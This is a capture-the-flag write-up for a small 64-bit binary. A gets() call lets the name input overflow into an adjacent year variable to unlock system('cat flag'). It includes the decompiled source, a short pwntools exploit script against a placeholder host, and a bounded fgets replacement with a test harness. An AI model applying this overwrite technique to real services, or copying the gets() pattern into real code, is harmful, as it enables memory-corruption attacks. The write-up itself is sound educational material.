# My earlier write-up for this challenge was finished but I accidentally deleted it, so here it is again = =!
checksec:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
IDA:
```c
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 result; // rax
  char v4; // [rsp+0h] [rbp-20h]
  unsigned int v5; // [rsp+8h] [rbp-18h]
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("What's Your Birth?");
  __isoc99_scanf("%d", &v5);
  while ( getchar() != 10 )
    ;
  if ( v5 == 1926 )
  {
    puts("You Cannot Born In 1926!");
    result = 0LL;
  }
  else
  {
    puts("What's Your Name?");
    gets(&v4);
    printf("You Are Born In %d ", v5);
    if ( v5 == 1926 )
    {
      puts("You Shall Have Flag.");
      system("cat flag");
    }
    else
    {
      puts("You Are Naive.");
      puts("You Speed One Second Here.");
    }
    result = 0LL;
  }
  return result;
}
```
The idea is simple. The birth year entered first must not be 1926, but once inside the else branch the year has to equal 1926 to get the flag. The name is read with `gets()` into `v4` at `rbp-0x20`, while the year `v5` sits at `rbp-0x18`, 8 bytes above it, so writing 8 bytes of padding followed by 1926 when entering the name overwrites the year with 1926. The canary at `rbp-0x8` is not reached, so it does not matter here.
exp:
```python
from pwn import *

# placeholder target; replace with the challenge's host and port
io = remote("ipaddr", port)

# anything that is not 1926 passes the first check (non-numeric input
# simply leaves scanf unmatched)
io.sendlineafter(b'Birth?', b'beef')

# 8 bytes to fill v4 up to v5, then the year 1926 (0x786)
payload = b'a' * 8 + p64(1926)
io.sendlineafter(b'Name?', payload)

io.interactive()
```
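For comparison, here is how the name prompt would look with the `gets()` call replaced by a bounded read. This is an added example, not the challenge's source: `birth_frame` is a hypothetical struct that mirrors the decompiled frame (8-byte name followed by the 4-byte year), and `feed_name` drives the reader from a constructed in-memory input instead of a socket.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical layout mirroring the decompiled frame: the name buffer at
 * rbp-0x20 and the year at rbp-0x18 are 8 bytes apart. Constructed for
 * this example. */
struct birth_frame {
    char name[8];
    unsigned int year;
};

/* Bounded replacement for gets(): reads at most sizeof(name)-1 bytes,
 * strips the trailing newline, and drains the rest of an overlong line so
 * that excess input is discarded rather than written past `name` into
 * `year`. Returns 0 on success, -1 on EOF or read error. */
int read_name_bounded(FILE *in, struct birth_frame *f)
{
    if (fgets(f->name, sizeof f->name, in) == NULL)
        return -1;

    size_t len = strlen(f->name);
    if (len > 0 && f->name[len - 1] == '\n') {
        f->name[len - 1] = '\0';          /* whole line fit */
    } else {
        int c;                             /* line was longer than the buffer */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return 0;
}

/* Test harness: feeds a constructed string through a temporary FILE* so the
 * reader can be exercised offline. Returns read_name_bounded's result. */
int feed_name(const char *input, struct birth_frame *f)
{
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    fwrite(input, 1, strlen(input), in);
    rewind(in);
    int rc = read_name_bounded(in, f);
    fclose(in);
    return rc;
}

int main(void)
{
    struct birth_frame f;
    memset(&f, 0, sizeof f);
    f.year = 1999;

    /* 24 bytes of name: far more than the 8-byte buffer */
    feed_name("AAAAAAAAAAAAAAAAAAAAAAAA\n", &f);
    printf("name=\"%s\" year=%u\n", f.name, f.year);   /* year stays 1999 */
    return 0;
}
```

With `fgets` the name is truncated to 7 characters plus the terminator and the year field keeps its value no matter how long the input line is, which is exactly the property the original `gets()` call lacks.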